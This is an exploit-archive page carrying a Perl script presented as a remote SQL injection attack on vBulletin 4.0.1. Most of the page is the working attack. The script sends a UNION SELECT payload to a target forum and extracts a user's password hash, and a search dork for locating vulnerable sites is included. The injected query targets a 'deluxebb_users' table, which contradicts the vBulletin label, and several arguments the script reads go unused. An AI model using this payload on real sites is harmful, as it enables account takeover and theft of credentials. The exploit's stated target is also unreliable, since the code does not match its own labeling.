what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

vBulletin 4.0.1 SQL Injection

vBulletin 4.0.1 SQL Injection
Posted Jan 19, 2010
Authored by indoushka

vBulletin version 4.0.1 remote SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | 7ca16ed212665bed18d50cbdcc685b2bc7db4a49fb7753ba38ccbff91672dca8

vBulletin 4.0.1 SQL Injection

Change Mirror Download
#!/usr/bin/perl 

use IO::Socket;


print q{
#######################################################################
# vBulletin™ Version 4.0.1 Remote SQL Injection Exploit #
# By indoushka #
# www.iq-ty.com/vb #
# Souk Naamane (00213771818860) #
# Algeria Hackerz (indoushka@hotmail.com) #
# Dork: Powered by vBulletin™ Version 4.0.1 #
#######################################################################
};

if (!$ARGV[2]) {

print q{
Usage: perl VB4.0.1.pl host /directory/ victim_userid

perl VB4.0.1.pl www.vb.com /forum/ 1


};

}


$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ;


print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{

if ($answer =~/(\w{32})/)
{

if ($1 ne 0) {
print "Password is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";

}
exit();
}

}
print "------------------------------------------------------------------------------------------------\r\n";

================================ Dz-Ghost Team ========================================================
Greetz : ÔßÑÇ áÓßÇä æáÇíÉ ÓíÏí ÈáÚÈÇÓ 22 + äÇÓ ãÚÓßÑ + äÇÓ ÊíÇÑÊ + äÇÓ ÇáÌáÝÉ + äÇÓ ÇáãÓíáÉ
+ äÇÓ ÊáãÓÇä + äÇÓ äÏÑæãÉ +äÇÓ ãÛäíÉ + äÇÓ æÌÏÉ +äÇÓ ÃÛÇÏíÑ + äÇÓ ÝÇÓ æãßäÇÓ + äÇÓ æåÑÇä
Exploit-db Team (loneferret+Exploits+dookie2000ca)
all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 * www.hackteach.org
Rafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad * redda * mourad (dgsn.dz) * www.cyber-mirror.org
www.forums.ibb7.com * www.owned-m.com *Stake (v4-team.com) * www.dev-chat.com * Cyb3r IntRue (avengers team)
* www.securityreason.com * www.packetstormsecurity.org * www.best-sec.net * www.zone-h.net * www.m-y.cc
* www.hacker.ps * no-exploit.com * www.bug-blog.de * www.bawassil.com * www.host4ll.com * www.xp10.me
www.forums.soqor.net * www.alkrsan.net * blackc0der (www.forum.aria-security.com) * www.kadmiwe.net
SoldierOfAllah (www.m4r0c-s3curity.cc) * www.arhack.net * www.google.com * www.sec-eviles.com
www.mriraq.com * www.dzh4cker.l9l.org * www.goyelang.cn * www.arabic-m.com * www.securitywall.org
r1z (www.sec-r1z.com) * www.zac003.persiangig.ir * www.0xblackhat.ir * www.mormoroth.net
------------------------------------------------------------------------------------------------------------
Login or Register to add favorites

File Archive:

June 2024

 • Su
 • Mo
 • Tu
 • We
 • Th
 • Fr
 • Sa
 • 1
  Jun 1st
  0 Files
 • 2
  Jun 2nd
  0 Files
 • 3
  Jun 3rd
  18 Files
 • 4
  Jun 4th
  21 Files
 • 5
  Jun 5th
  0 Files
 • 6
  Jun 6th
  57 Files
 • 7
  Jun 7th
  6 Files
 • 8
  Jun 8th
  0 Files
 • 9
  Jun 9th
  0 Files
 • 10
  Jun 10th
  12 Files
 • 11
  Jun 11th
  27 Files
 • 12
  Jun 12th
  38 Files
 • 13
  Jun 13th
  16 Files
 • 14
  Jun 14th
  14 Files
 • 15
  Jun 15th
  0 Files
 • 16
  Jun 16th
  0 Files
 • 17
  Jun 17th
  0 Files
 • 18
  Jun 18th
  0 Files
 • 19
  Jun 19th
  0 Files
 • 20
  Jun 20th
  0 Files
 • 21
  Jun 21st
  0 Files
 • 22
  Jun 22nd
  0 Files
 • 23
  Jun 23rd
  0 Files
 • 24
  Jun 24th
  0 Files
 • 25
  Jun 25th
  0 Files
 • 26
  Jun 26th
  0 Files
 • 27
  Jun 27th
  0 Files
 • 28
  Jun 28th
  0 Files
 • 29
  Jun 29th
  0 Files
 • 30
  Jun 30th
  0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close